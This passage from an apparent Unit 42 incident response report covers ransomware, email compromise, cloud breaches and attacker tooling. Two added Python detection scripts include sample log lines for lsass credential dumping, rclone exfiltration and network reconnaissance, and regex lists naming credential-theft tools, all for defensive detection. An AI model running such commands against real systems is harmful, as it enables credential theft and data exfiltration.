As of May 25, 2022, LockBit 2.0 accounted for 46% of all ransomware-related breach events shared on leak sites in 2022. The LockBit 2.0 RaaS leak site has published names and information about more than 850 compromised organizations. The site itself typically features information such as victim domains, a time tracker and measures of how much data was compromised.

LockBit 2.0 has been observed changing infected computers’ backgrounds to a ransom note, which not only demands payment but also attempts to recruit insiders from targeted organizations. Notes that we’ve observed claimed that threat actors would pay “millions of dollars” to insiders who provided access to corporate networks or facilitated a ransomware infection by opening a phishing email and/or launching a payload manually. The threat actors also expressed interest in other access methods such as RDP, VPN and corporate email credentials. In exchange, they offer a cut of the paid ransom.

These tactics underscore how organizations must prepare to defend against evolving business models being used by threat actors. LockBit 2.0 is not simply aiming to encrypt data and halt business operations; the group also aims to do reputational harm and to encourage insider threats. Defense against this type of ransomware requires a comprehensive awareness of possible attack vectors and a strong incident response plan for mitigating damage after an initial breach.



Ransomware: Initial Access

Ransomware threat actors appear to favor different means of initial access than we saw in our overall statistics. For ransomware, the suspected means of initial access for 48% of our cases came from software vulnerabilities. This is followed by brute-force credential attacks at 20%, phishing at 12%, and both previously compromised credentials and abuse of trusted relationships or tools at 8%.

The heavy use of software vulnerabilities matches the opportunistic behavior we often see from ransomware actors. They typically scan the internet at scale for vulnerabilities and weak points where they can focus. This approach and brute-force credential attacks (typically focused on RDP) can get them the majority of their business.

Figure 5: Ransomware – Suspected Means of Initial Access (software vulnerabilities 48%, brute-force credential attacks 20%, phishing 12%, previously compromised credentials 8%, abuse of trusted relationship(s)/tool(s) 8%, other 4%)

Ransom Demands and Payments

We have seen ransom demands as high as $30 million over the past year, and we have seen instances of clients paying ransoms over $8 million.

Threat actors increasingly mention cyber insurance during ransomware negotiations as a reason why a victim organization can afford to pay a ransom. This is sometimes just a negotiation tactic, as we have observed this even with clients who are uninsured. Even so, threat actors do attempt to access financial information when they have unauthorized access to a victim organization and calculate ransom demands based on the (perceived) revenue of the organization being extorted.

News reports often include other examples of large ransom demands or payments.

“Threat actors will find a way into a network if they want to.”
Jessica Ho, Unit 42 Principal Consultant




Ransom Demands and Payments by Industry

When we break our case data by industry, we find the averages and medians shown in Figures 6 and 7. (Note: The median payments shown in Figure 7 are calculated using only cases where a ransom was paid and do not directly relate to the average amount demanded shown in Figure 6.)

Key Insight: Ransomware attacks can happen fast.
The median dwell time we observed for ransomware attacks – meaning the time threat actors spend in a targeted environment before being detected – was 28 days. Our security consultants say that clients most often learn about ransomware attacks the hard way—when they receive a ransom note.

Figure 6: Average Ransom Demand by Industry
Finance: $7.96M
Real Estate: $5.20M
Wholesale & Retail: $3.05M
High Tech: $2.52M
Construction: $2.02M
Manufacturing: $1.63M
Transportation & Logistics: $1.53M
Hospitality: $1.47M
Healthcare: $1.41M
Education: $0.69M
Professional & Legal Services: $0.63M

Figure 7: When Ransom is Paid: Median Reduction from Initial Demand by Industry (median ransom paid vs. median ransom demand for High Technology, Manufacturing, Transportation & Logistics, Wholesale & Retail, Healthcare, Finance, and Professional & Legal Services; the reductions charted range from 51% to 85%)




Most Active Ransomware Groups

Among the cases our incident response consultants handled, certain ransomware groups stood out as particularly active. Ransomware groups are often known for using particular tactics, techniques, and procedures (TTPs), so knowing which groups are most active and dangerous can help your security teams determine where to focus your defense. Be aware, however, that new ransomware groups start up regularly, and existing groups often rebrand for a variety of reasons, including to shift their approach or to avoid attention from law enforcement.

Unit 42 regularly releases freely available overviews of active ransomware groups, including TTPs and advice for how to defend against them. Read our assessments of:
• Conti
• LockBit 2.0
• Phobos
• Dharma
• REvil
• BlackCat

Sign up for notifications on new research about ransomware groups and other threats. For an in-depth ransomware update and overview of ransomware threat actors and their TTPs, refer to the 2022 Unit 42 Ransomware Threat Report or our corresponding webinar.

Figure 8: Top Confirmed Ransomware Actors Observed in Unit 42 Cases (Most Active Ransomware Variants in 2022 - Unit 42 Incident Response Data)
Conti: 22%
LockBit / LockBit 2.0: 14%
Hive: 8%
Dharma: 7%
PYSA: 7%
Phobos: 7%
ALPHV / BlackCat: 6%
REvil: 5%
BlackMatter: 5%
Other Variants: 18%



Industries Affected by Ransomware vs Ransomware Groups

Figure 9A: Industries Affected by Ransomware vs Ransomware Groups (panels: Professional & Legal Services, Healthcare, Manufacturing, Education, High Technology, Hospitality; groups charted in each panel: LockBit / LockBit 2.0, Conti, Hive, BlackCat, PYSA, Dharma, REvil, BlackMatter, Phobos)



Figure 9B: Industries Affected by Ransomware vs Ransomware Groups (panels: Wholesale & Retail, Finance & Insurance, Construction, Transportation & Logistics, Real Estate, State & Local Government; groups charted in each panel: LockBit / LockBit 2.0, Conti, Hive, BlackCat, PYSA, Dharma, REvil, BlackMatter, Phobos)



04
Spotlight: Business Email Compromise
UNDER THE RADAR, BUT COSTLY

Case Study
It was a typical day for our client, an executive with a U.S. financial services firm that relies on a widely used MFA mobile app to protect access to email, customer files, and other sensitive data. His iPhone kept pinging him with MFA requests to access his email, interrupting him on a day packed with customer meetings. He was annoyed by the intrusion, figuring it was some kind of system error, and rejected each request so he could focus on work.

He thought it was over when the requests stopped. Months later, however, he learned he had fallen for an MFA fatigue attack. He had mistakenly authorized one of those many requests, unknowingly granting an attacker unfettered access to his email. He learned about the compromise when his bank flagged suspicious wire transfers totaling nearly $1 million. Our investigation uncovered the exposure of data belonging to the company, its employees, and clients.

Fortunately, the company was able to recover the stolen funds, but attacks of this nature can still be costly in terms of reputation—as well as the time and resources spent cleaning up after them.

For more examples of BEC from Unit 42 case files, refer to our blog, "Nightmare Email Attacks (and Tips for Blocking Them)."

Key Business Email Compromise Data Points From Unit 42 Investigations
7-48 DAYS: Typical Dwell Time Prior to Containment
38 DAYS: Median Dwell Time
$286,000: Average Amount of Successful Wire Fraud




While ransomware attacks tend to dominate the headlines, cybercriminals continue to compromise business emails for financial gain. The U.S. Federal Bureau of Investigation calls BEC the “$43 billion scam,” referring to statistics for incidents reported to the Internet Crime Complaint Center from 2016-2021.

Techniques for business email compromise can vary. Some threat groups gain access to targeted accounts through brute-force credential attacks, for example. However, social engineering, including phishing, is often an easy and cost-effective way to gain clandestine access while maintaining a low risk of discovery.

In many cases, cybercriminals are simply asking their unwitting targets to hand over their credentials—and getting them.

SilverTerrier
Over the past half decade, Unit 42 has actively monitored the evolution of
business email compromise with a unique focus on threat actors based in
Nigeria, which we track under the name “SilverTerrier.”

While BEC is a global threat, our focus on Nigerian actors provides insights
into one of the largest subcultures of this activity, given the country’s
consistent ranking as one of the top hotspots for cybercrime. We have
compiled one of the most comprehensive data sets across the cybersecurity
industry, with over 170,700 samples of malware from over 2.26 million
phishing attacks, linked to roughly 540 distinct clusters of BEC activity.

This telemetry enables Unit 42 researchers to proactively share intelligence


on cybercriminals with law enforcement agencies. We were recently able
to assist with investigations and operations led by INTERPOL, resulting in
several high-profile BEC actors being arrested in Operation Falcon II and
Operation Delilah.



05
Spotlight: Cloud Incidents
LOW-HANGING FRUIT
FOR THREAT ACTORS

Cloud incident response cases deserve a separate discussion because our incident response consultants say there are two key distinctions in the cloud cases we handle:

1. Different technology concepts mean that incident response cases in the cloud often work differently than traditional incident response cases.
2. Right now, cloud threat actors have it easy due to the many unknown facets of the current cloud threat landscape (though organizations have the power to change this).

“Right now, threat actors in the cloud don't have to try very hard to be successful at what they do. They may look around and say, 'Okay, there is a door, here are the keys – nobody even knows we found them. Let's see if this works. Oh, it does!' Then they take what they think is worth something, leave a ransom note, and kick over a few flower pots on the way out—just to add a dash of destruction.”
Ashlie Blanca, Unit 42 Consulting Director

How the Cloud Landscape Changes Incident Response
Cloud environments are ever-changing. Instances are spun up briefly to handle key workloads, and the next day they no longer exist. Standard incident response procedures, specific to data collection, often aren’t as effective in cloud environments because the cloud landscape is both dynamic and ephemeral, and cloud environments can be complex, often using a variety of applications and tools that may even be hosted across several different cloud service providers (CSPs). This can create a challenge in identifying the full scope.

Case Study
An organization set up a cloud environment for a short-term project. It was left exposed to the internet and misconfigured with a blank root password. A threat actor happened to find the asset and came in, wiped the data, and left a ransom note.




Incident response cases involving cloud breaches call for a different understanding of how to gather evidence. Ephemeral workloads may mean it’s not as simple as pulling a standard set of logs, and the amount of data required for review often far exceeds what’s seen in a traditional case. Working in the cloud also requires an understanding of the shared responsibility model. Some aspects of security are the responsibility of the CSPs hosting data and applications, but others are the responsibility of the customer.

Many customers appreciate the “plug and play” aspects of operating in the cloud, and they operate trusting in the security controls afforded by major CSPs, but that security breaks down when organizations don’t realize that those security controls often need to be activated and properly configured. Organizations are also responsible for identity and access management (IAM)—setting and maintaining proper controls over who can do what in a given cloud environment.

While understanding cloud technologies and configuring them properly is a general issue in cloud security, it can have a specific impact on incident response. For example, if an organization hasn’t properly configured data and logs, it’s possible not to have access to that information in the event of a breach. In some cases, our consultants report having to subpoena CSPs to obtain key information for an investigation—a time-consuming process at a moment when every second counts.

Why Cloud Threat Actors Have it Easy

Our security consultants say that misconfigurations are a primary root cause of breaches in the cloud—and the problem appears to be growing worse. Properly configured cloud environments ensure that data is preserved and present, turn on security controls provided by CSPs, and manage identity and access to avoid sharing powerful capabilities or sensitive information with people who don’t need it.

Improperly configured cloud environments can essentially leave the door unlocked for malicious actors, allowing them to gain initial access without needing to find and exploit a vulnerability or make use of sophisticated techniques. Unfortunately, improperly configured cloud environments are extremely common. Recent Unit 42 research into IAM analyzed more than 680,000 identities across 18,000 cloud accounts from 200 different organizations and found that nearly all (99%) lacked the proper IAM policy controls to remain secure. This matters because the same research found that 65% of known cloud security incidents were due to misconfigurations.




To make matters worse, when Unit 42 researchers have followed changes in misconfigurations over time, they’ve observed more misconfigurations, not fewer. We’ve also observed that known cloud incidents have grown at a faster rate than cloud workloads. This essentially means that threat actors targeting cloud environments have plenty of low-hanging fruit to choose from. As a result, our security consultants focused on cloud incident response say they don’t typically see the same types of cases that are common for the rest of the organization. Ransomware, for example, is harder to deploy in cloud environments and often calls for more complexity than cloud threat actors need to meet their goals.

Instead, many threat actors targeting cloud environments simply steal credentials—often stored externally in GitHub or other code-sharing instances and not sufficiently secured—and then engage in data theft or destruction. Occasionally, threat actors extort organizations by using their access to drive up resource costs, coercing payment through the threat of an exorbitant bill from a CSP. These tactics allow threat actors to make money by selling sensitive information or extorting organizations without needing to use sophisticated malware.

How to Make a Cloud Threat Actor’s Job Harder

Our consultants say that one of the best things organizations can do to protect against breaches in cloud environments is to ensure that those responsible for those environments are well-trained in how to properly configure them and how to manage access securely. Simply making it harder for threat actors to gain access would prevent a great number of today’s cloud incidents. Our clients often notice a breach due to alerts going off or an uptick in resource usage. This means that ensuring that monitoring and logging are properly set up can help identify issues quickly.

As long as the majority of organizations are leaving cloud threat actors easy access points, attackers likely won’t mature their techniques. After all, why work harder than necessary? However, our consultants predict that as more organizations learn how to properly safeguard cloud environments, threat actors will likely begin to use more sophisticated techniques.

For an in-depth overview of cloud security findings, with a particular focus on the importance of identity and access management and the TTPs of cloud threat actors, refer to the Unit 42 Cloud Threat Report, Volume 6, or watch Unit 42 researchers discuss these issues in an on-demand video.



06
Seven Issues Threat Actors
Don’t Want You to Address
When breaches happen, one of the most common questions
after the fact is: What went wrong? Below are the most
common answers from the cases we handled.

Consider this list a reverse-engineered set of recommendations based on our case observations from the past year. If you ensure your organization addresses the issues below before an incident occurs, you can discourage threat actors who are after low-hanging fruit. If threat actors do try to attack your systems, they’ll have a harder task ahead. In other words, here are seven issues threat actors are hoping you won’t get around to addressing.

1. Multifactor authentication
In 50% of cases, organizations lacked multifactor authentication on key internet-facing systems such as corporate webmail, virtual private network (VPN) solutions and other remote access solutions.

2. EDR/XDR
In 44% of cases, organizations did not have an endpoint detection and response (EDR) or extended detection and response (XDR) security solution or it was not fully deployed on the initially impacted systems to detect and respond to malicious activities.

3. Patch management
In 28% of cases, having poor patch management procedures contributed to threat actor success. This refers to any time a non-zero-day vulnerability was exploited by a threat actor in any way and includes situations in which an exploit helped a threat actor at some point after initial access. It does not include cases when threat actors exploited a zero-day vulnerability to gain access.

4. Mitigations for brute-force attacks
In 13% of cases, organizations had no mitigations in place to ensure account lockout for brute-force credential attacks.

5. Security alerts
In 11% of cases, organizations failed to review/action security alerts.

6. Password security
In 7% of cases, weak password security practices contributed to threat actors’ ability to further their objectives (e.g., default password, blank or empty password, easily guessed or brute-forced password).

7. Misconfigurations
In 7% of cases, system misconfiguration was a contributing factor to the incident.
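As an added example (not Unit 42's code) of how two of these gaps show up in authentication telemetry: the first check flags accounts that kept accepting password attempts past a lockout threshold (issue 4), the second flags the MFA push-denial-then-approval sequence from the BEC case study earlier in the report. The log format, event names and thresholds are assumptions; map your identity provider's fields onto them.

```python
"""Two checks that go with the report's findings on missing account lockout
(issue 4) and the MFA fatigue case in the BEC spotlight.

Added example, not Unit 42 code. The log format, the event names and the
thresholds are assumptions; map your identity provider's fields onto them.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: "<ISO timestamp> <user> <source ip> <event>"
# Events: LOGIN_FAIL / LOGIN_OK (password step), MFA_DENY / MFA_APPROVE (push step)
SAMPLE_LOG = """\
2022-05-10T02:00:00 svc.backup 192.0.2.55 LOGIN_FAIL
2022-05-10T02:00:10 svc.backup 192.0.2.55 LOGIN_FAIL
2022-05-10T02:00:20 svc.backup 192.0.2.55 LOGIN_FAIL
2022-05-10T02:00:30 svc.backup 192.0.2.55 LOGIN_FAIL
2022-05-10T02:00:40 svc.backup 192.0.2.55 LOGIN_FAIL
2022-05-10T02:01:10 svc.backup 192.0.2.55 LOGIN_OK
2022-05-10T09:00:05 exec.cfo 198.51.100.23 LOGIN_OK
2022-05-10T09:00:06 exec.cfo 198.51.100.23 MFA_DENY
2022-05-10T09:03:40 exec.cfo 198.51.100.23 MFA_DENY
2022-05-10T09:07:12 exec.cfo 198.51.100.23 MFA_DENY
2022-05-10T09:11:55 exec.cfo 198.51.100.23 MFA_DENY
2022-05-10T09:15:02 exec.cfo 198.51.100.23 MFA_APPROVE
2022-05-10T10:30:00 j.doe 10.20.30.40 LOGIN_OK
2022-05-10T10:30:04 j.doe 10.20.30.40 MFA_DENY
2022-05-10T10:30:20 j.doe 10.20.30.40 MFA_APPROVE
"""


def parse_events(text):
    """Parse the sample format into (timestamp, user, ip, event), oldest first."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, user, ip, event = line.split()
            events.append((datetime.fromisoformat(ts), user, ip, event))
    return sorted(events, key=lambda e: e[0])


def find_bruteforce(events, max_failures=5, window=timedelta(minutes=10)):
    """Accounts that reached max_failures failed logins inside `window`.

    A lockout policy should stop the account at that point, so a LOGIN_OK
    shortly after the threshold is recorded as evidence that none was in place.
    """
    recent = defaultdict(list)   # user -> timestamps of failures in the window
    findings = {}                # user -> finding
    for ts, user, ip, event in events:
        if event == "LOGIN_FAIL":
            recent[user] = [t for t in recent[user] if ts - t <= window] + [ts]
            if len(recent[user]) >= max_failures:
                f = findings.setdefault(user, {"user": user, "source": ip,
                                               "threshold_at": ts,
                                               "login_after": None})
                f["failures"] = len(recent[user])
        elif event == "LOGIN_OK" and user in findings:
            f = findings[user]
            if f["login_after"] is None and ts - f["threshold_at"] <= window:
                f["login_after"] = ts
    return list(findings.values())


def find_mfa_fatigue(events, min_denials=3, window=timedelta(minutes=30)):
    """Users who approved a push after denying at least min_denials pushes
    inside `window`: the sequence in the case study, where the approval is the
    moment the attacker gets in."""
    denials = defaultdict(list)
    findings = []
    for ts, user, ip, event in events:
        if event == "MFA_DENY":
            denials[user] = [t for t in denials[user] if ts - t <= window] + [ts]
        elif event == "MFA_APPROVE":
            n = len([t for t in denials[user] if ts - t <= window])
            if n >= min_denials:
                findings.append({"user": user, "source": ip,
                                 "denials_before_approve": n, "approved_at": ts})
            denials[user] = []   # an approval closes the episode
    return findings


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG)
    for f in find_bruteforce(evs):
        print("no lockout:", f)
    for f in find_mfa_fatigue(evs):
        print("mfa fatigue:", f)
```

On the constructed sample, svc.backup is reported because a successful login followed five failures with nothing stopping it, and exec.cfo is reported for four denials followed by an approval; j.doe's single denial stays below the threshold.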




Case Study

Unit 42 incident responders assisted a client with a matter where it was determined that the threat actor was persistently accessing the environment using the client’s VPN solution. The company’s IT personnel were bewildered as to how this could happen since they required MFA for all accounts. Unit 42 determined that a single IT administrator had been granted an exception and used a web-based SSL VPN portal to support a legacy solution that did not require MFA, and this ended up being the threat actor’s entry vector.

In many of these matters, organizations did do some of these things in many instances. But even one gap is all an attacker needs to get a foothold into a victim’s environment.

Likewise with EDR/XDR deployment, even in environments with broad coverage, there can be “shadow IT” (unmanaged or unauthorized) systems in the environment with inadequate security controls, or unsupported legacy systems with deficient protections. Often companies are unaware of these systems, and they can end up being contributing factors to a cybersecurity incident.

Therefore, one important step organizations can take to improve defenses is to conduct a thorough inventory of what’s on the network and watch out for anomalies, which can be done through an attack surface management solution. If you know the attack surface, you have a better chance of getting ahead of a threat actor.

“If your organization has an EDR or XDR solution, make sure to monitor the alerts. I have been on multiple engagements where threat actors were eventually able to disable EDR and antivirus to deploy ransomware. The clients sometimes see this as a failure of their security product, when in fact, their security tool has been telling them there are major, obvious problems for weeks or even months before the threat actor was finally able to get to a point where they could disable security tools. This advice also applies to old school antivirus for organizations that don’t have EDR or XDR. Many threat actor tools will be blocked by antivirus. It is important to stay on top of what your security tools are blocking so you can take appropriate action.”
John Percival, Unit 42 Consultant

50% of organizations involved in breaches lacked multifactor authentication on key internet-facing systems.



07
What Threat Actors Do Once They’re Inside a Network

This section describes the capabilities we most commonly observed threat actors using in our incident response cases after initial compromise of a network. If you work closely with the specifics of your organization’s systems, this list can help you see what you most need to watch for. If you safeguard your organization from a higher-level perspective, you can share this list with your security team or use it to help you gain an understanding of how threat actors typically behave once they’re inside.

Once attackers gain access to a network, they have certain typical goals. For example, they might begin using tactics associated with discovery—gaining knowledge about the system and internal network—in order to decide what to do next.

Discovery
This is a step attackers take to figure out what they can do with the access they’ve gained. They’re essentially exploring a system and internal network to see what they can control, what they can steal, what else they can attack, etc.

Capabilities most commonly used for discovery
• Advanced IP Scanner
• Advanced Port Scanner
• AdFind
• Nmap

Command and Control or Beacon
Command and control (C2) covers the techniques that attackers use to communicate between a network they’ve compromised and a network they control. For example, malware often “phones home” to a C2 server to check for other malware to download or to send exfiltrated data to the threat actor. Attackers typically take steps to make C2 traffic appear “normal” in some way to make it harder for organizations to notice that a breach has occurred.

Capabilities most commonly used for C2/Beacon
• Cobalt Strike
• Metasploit




Lateral Movement
An attacker gains initial access to a specific part of a network. Similar
to opening doors to get from a foyer into other parts of a house, lateral
movement is the process attackers use to move into and control other
systems on a network. Doing this expands the impact an attacker can
have in a compromised environment.

Capabilities most commonly used for lateral movement
• AnyDesk
• ConnectWise/ScreenConnect
• TeamViewer
• Splashtop
• Microsoft Remote Desktop
• LogMeIn
• TightVNC
• PuTTY

Key Insight
Our incident responders sometimes find that threat actors have been
active in an environment for much longer than initially thought by
the client. In some cases, threat actors have been found to have been
active and moving laterally through an environment for a period of six
months or more.

Credential Harvesting
Credential harvesting is another way for attackers to gain access to
more resources or more sensitive information. It refers to methods
of stealing names and passwords. Like many other techniques here,
this expands access for the threat actor, which in turn expands the
potential impact of the breach.

Capabilities most commonly used for credential harvesting
• Mimikatz
• LaZagne
• Impacket secretsdump
• Procdump targeting lsass process
• Multifunctional post-exploitation tools (e.g., Cobalt Strike)




Exfiltration
Exfiltration means stealing data. This is often where attackers
make their money. Once they steal data, they can sell it to interested
parties or extort the target by threatening to release it publicly.

Capabilities most commonly used for exfiltration
• Applications
− Rclone
− MEGASync
− FileZilla
− WinSCP
• Compression
− 7-Zip
− WinRAR
• Web/cloud storage services
− MEGA
− Dropbox
− Google Drive
− OneDrive
− DropMeFiles
− Sendspace
− Web Email Services
− Threat Actor Controlled System

“The quantity of stolen data does not directly correlate to the negative impact of its theft. Unauthorized acquisition of a single spreadsheet containing a list of individuals’ personally identifiable information (PII) could result in a large data breach, even though the file size itself may be very small. Companies should avoid storing such repositories of sensitive information in unencrypted files and should be cognizant of where this information is located in their environment.”
Dan O’Day, Unit 42 Consulting Director

Classifying Attacker Behavior

One common language for understanding adversary tactics and techniques, used by many organizations globally, is the MITRE ATT&CK framework, which seeks to classify real-world observations of threat actors. This framework provides a way to understand the underlying purpose of the actions attackers take, and it provides a clear way to communicate about these actions across organizations. When Unit 42 publishes about adversary behavior, we typically align what we’ve seen with this framework, and it can be a useful reference if you’re seeking more information about any of the categories of attacker behavior listed here.
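To turn the tool lists in this chapter into a detection pass, here is an added example (not Unit 42's code) that classifies constructed process-creation events into the stages named above and flags an archiver followed by an upload tool on the same host, the pairing behind the exfiltration list. The log format, the executable catalogue and the two-hour window are assumptions, and the catalogue is illustrative rather than complete.

```python
"""Map endpoint process-creation events onto the post-compromise stages this
chapter lists, using the tools it names, and flag the archive-then-upload
pairing behind exfiltration.

Added example, not Unit 42 code. The log format, the executable catalogue and
the time window are assumptions; the catalogue is illustrative, not exhaustive.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: "<ISO timestamp>|<host>|<user>|<image path>|<command line>"
SAMPLE_EVENTS = """\
2022-04-02T01:12:03|FS01|corp\\jsmith|C:\\Tools\\AdFind.exe|adfind.exe -f objectcategory=computer
2022-04-02T01:14:40|FS01|corp\\jsmith|C:\\Tools\\nmap.exe|nmap -p 445,3389 10.0.0.0/24
2022-04-02T01:30:11|FS01|corp\\jsmith|C:\\Temp\\procdump64.exe|procdump64.exe -ma lsass.exe C:\\Temp\\ls.dmp
2022-04-02T02:05:00|FS01|corp\\jsmith|C:\\Users\\jsmith\\AppData\\Local\\AnyDesk\\AnyDesk.exe|AnyDesk.exe --service
2022-04-02T02:40:09|FS01|corp\\jsmith|C:\\Program Files\\7-Zip\\7z.exe|7z.exe a finance.7z D:\\Shares\\Finance
2022-04-02T02:52:31|FS01|corp\\jsmith|C:\\Temp\\rclone.exe|rclone.exe copy finance.7z remote:staging
2022-04-02T08:15:00|WS22|corp\\amy|C:\\Program Files\\7-Zip\\7z.exe|7z.exe a quarterly.zip Q1.xlsx
2022-04-02T08:20:00|WS22|corp\\amy|C:\\Sysinternals\\procdump64.exe|procdump64.exe -ma notepad.exe C:\\Temp\\np.dmp
"""

# (stage from this chapter, regex on the lower-cased image basename,
#  optional regex the command line must also match). procdump is a legitimate
# Sysinternals tool, so it only counts when it is pointed at lsass.
CATALOGUE = [
    ("Discovery", r"^(adfind|nmap|advanced_ip_scanner|advanced_port_scanner)(\.exe)?$", None),
    ("Lateral Movement", r"^(anydesk|teamviewer|putty|mstsc|logmein)(\.exe)?$", None),
    ("Credential Harvesting", r"^(mimikatz|lazagne|secretsdump(\.py)?)(\.exe)?$", None),
    ("Credential Harvesting", r"^procdump(64)?(\.exe)?$", r"lsass"),
    ("Exfiltration", r"^(rclone|megasync|filezilla|winscp)(\.exe)?$", None),
    ("Exfiltration staging", r"^(7z|7zg|winrar|rar)(\.exe)?$", None),
]


def parse_events(text):
    """Parse the sample format into dicts, oldest event first."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, host, user, image, cmdline = line.split("|", 4)
            events.append({"ts": datetime.fromisoformat(ts), "host": host,
                           "user": user, "image": image, "cmdline": cmdline})
    return sorted(events, key=lambda e: e["ts"])


def classify(event):
    """Return the stage one event maps to, or None if it matches nothing."""
    basename = event["image"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    for stage, image_re, cmd_re in CATALOGUE:
        if re.match(image_re, basename) and (
                cmd_re is None or re.search(cmd_re, event["cmdline"], re.I)):
            return stage
    return None


def host_timelines(events):
    """Per host, the ordered list of (timestamp, stage, image name) hits."""
    out = defaultdict(list)
    for e in events:
        stage = classify(e)
        if stage:
            out[e["host"]].append((e["ts"], stage, e["image"].rsplit("\\", 1)[-1]))
    return dict(out)


def exfil_chains(events, window=timedelta(hours=2)):
    """Hosts where an archiver ran and an exfiltration tool followed within
    `window`. An archiver alone is routine admin work; the pairing is the signal."""
    findings = []
    for host, hits in host_timelines(events).items():
        staged = [t for t, s, _ in hits if s == "Exfiltration staging"]
        for t, s, img in hits:
            if s != "Exfiltration":
                continue
            prior = [p for p in staged if timedelta(0) <= t - p <= window]
            if prior:
                findings.append({"host": host, "staged_at": prior[0],
                                 "exfil_at": t, "tool": img})
    return findings


def intrusion_score(events):
    """Number of distinct post-compromise stages seen per host; several on one
    host in a short span is what an analyst should look at first."""
    return {host: len({s for _, s, _ in hits})
            for host, hits in host_timelines(events).items()}


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    for host, hits in host_timelines(evs).items():
        print(host, [(t.time().isoformat(), s, i) for t, s, i in hits])
    print("exfil chains:", exfil_chains(evs))
    print("stages per host:", intrusion_score(evs))
```

On the constructed sample, FS01 shows five distinct stages and an archive-then-rclone chain, while WS22's 7-Zip run and its procdump of notepad produce only one low-value hit and no chain.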



08
Predictions: Follow the Money

So far, we’ve shared key insights into current trends around breaches. We know attackers are often financially motivated and they’re looking for the easy way in—and we’ve shared the specifics of how that appears in the current threat landscape.

But we also asked our security consultants to take a guess at where threat actors are going in the near future. After all, so much of cybersecurity involves the constant attempt to stay ahead of ever-evolving threats – where might defenders get a leg up?

As always, the general advice is to continue to follow the money. Since much of what threat actors do is financially motivated, a good rule of thumb for defenders is to secure any pathway that could allow attackers to make a buck.

However, our on-the-ground view can give us more specific insights. Here are our incident responders’ top predictions for the coming year.

“One thing is certain: Wherever threat actors can make money is where they’re going to spend their time.”
Chris Brewer, Unit 42 Consulting Director

Prediction #1: Time to Patch High-Profile Vulnerabilities Will Continue to Shrink

Attackers are making increasing use of high-profile zero days—the kind you read about in the news. For evidence, see our earlier statistics on attackers’ use of Apache Log4j vulnerabilities, for example, and highly publicized vulnerabilities in Zoho ManageEngine ADSelfService Plus. Anytime a new vulnerability is publicized, our threat intelligence team observes widespread scanning for vulnerable systems. Our security consultants say they’re also seeing threat actors—ranging from the sophisticated to the script kiddies—moving quickly to take advantage of publicly available PoCs to attempt exploits.

While some threat actors continue to rely on older, unpatched vulnerabilities, we’re increasingly seeing that the time from vulnerability to exploit is getting shorter. In fact, it can practically coincide with the reveal if the vulnerabilities themselves and the access that can be achieved by exploiting them are significant enough. For example, Palo Alto Networks released a Threat Prevention signature for the F5 BIG-IP Authentication Bypass Vulnerability (CVE-2022-1388), and within just 10 hours, the signature triggered 2,552 times due to vulnerability scanning and active exploitation attempts.




The 2022 Attack Surface Management Threat Report found that attackers typically start scanning for vulnerabilities within 15 minutes of a CVE being announced. Additionally, end-of-life (EoL) systems remain unpatchable and available to an opportunistic attacker for exploitation. For example, the same report found that nearly 32% of exposed organizations are running the EoL version of Apache Web Server, which is open for remote code execution from the vulnerabilities CVE-2021-41773 and CVE-2021-42013. We expect this trend to continue and be augmented by the ongoing increase in internet-exposed attack surface.

“Asset inventory is a critical part of cybersecurity. You likely won’t secure what you aren’t aware of, and you have zero visibility into assets you don’t manage or know about.”
Dan O’Day, Unit 42 Consulting Director

What You Can Do to Get Ahead

Organizations may have previously grown used to taking time between the disclosure of a vulnerability and patching it, but while it’s still necessary to perform due diligence on a patch, attackers’ ability to scan the internet in search of vulnerable systems means it’s more important than ever to shorten the time it takes to patch. Organizations need to ramp up patch management and orchestration to try to close these known holes as soon as possible. An attack surface management solution can help organizations identify vulnerable internet-exposed systems and can often catch systems that organizations may not be aware are running on the network.

Prediction #2: Unskilled Threat Actors Are on the Rise

Our incident responders anticipate a rise in, to put it bluntly, threat actors
who don’t seem to know what they’re doing. Even threat actors who seem to have
attack basics down are beginning to resort to the simpler versions of
attacks—for example, using extortion without encryption rather than executing a
full-blown ransomware attack. Cloud incidents could also rise since threat
actors in the current environment often need to discover carelessly guarded
credentials rather than demonstrate advanced technical skill.

Several factors could contribute to the phenomenon. High-profile reports of
lucrative hacks combined with global economic pressures could push more people
to try their hand at becoming cybercriminals—whether or not they have the
technical skills. RaaS and similar affiliate programs could cause a flood of
wannabes. It’s also possible that nation-state recruitment of skilled threat
actors could leave spots open for novices wishing to operate more pedestrian
scams. Even unskilled attackers, however, could do damage to your organization
if they’re able to breach your systems.

Case Study

Unit 42 security consultants were attempting to negotiate for a ransomware
case, but the threat actors they needed to deal with had a broken chat portal
and busted infrastructure. This left no way to communicate with the threat
actors—or even to pay the ransom demand should the client have chosen to do so.

What You Can Do to Get Ahead

The good news about unskilled attackers is that they’re more likely to be
stopped when organizations follow best practices and consistently introduce
basic roadblocks. You can see this as an opportunity to reinvest in the
fundamentals and ensure that you’re using a defense-in-depth strategy.

Educate members of your organization about best practices to avoid social
engineering schemes—an approach often favored by less technically skilled
threat actors. Solidly covering the foundations of good cyber defense can
ensure that rookie cybercriminals looking for a quick payout have a very
frustrating day when they encounter your network.

Prediction #3: Changes to Cryptocurrency Could Cause a Rise in Business Email
and Website Compromises

One thing that currently contributes to the lucrative nature of ransomware is
the prevalence and relative anonymity of cryptocurrency, which gives attackers
a way to collect ransoms that avoids banks or institutions that might be able
to reveal their true identities. Recently, however, law enforcement agencies
have had greater success tracing crypto wallets back to their true owners and
recovering ransoms. The DOJ, for example, successfully recovered $2.3 million
in bitcoin tied to the Colonial Pipeline ransomware attack.

Further, changes in the availability or stability of cryptocurrency undermine
its utility as a means of payment. These trends may incentivize threat actors
to pivot back to classic fiat currency-based schemes. This could cause a rise
in, for example, traditional credit card fraud (often associated with website
compromise), and of course, BEC (already popular with threat actors).

What You Can Do to Get Ahead

It’s important to prepare against the possibility of ransomware—after all,
that’s the top incident type that our consultants see. However, don’t focus on
ransomware to the exclusion of all else. Your organization should institute
protections against any popular scheme that could earn threat actors money. In
that way, you can be ready if attackers shift to a different favorite attack
type.

Case Study

Unit 42 has helped organizations respond to multiple Lapsus$ attacks—a group
notable for its low emphasis on attacks that require technical skill. The
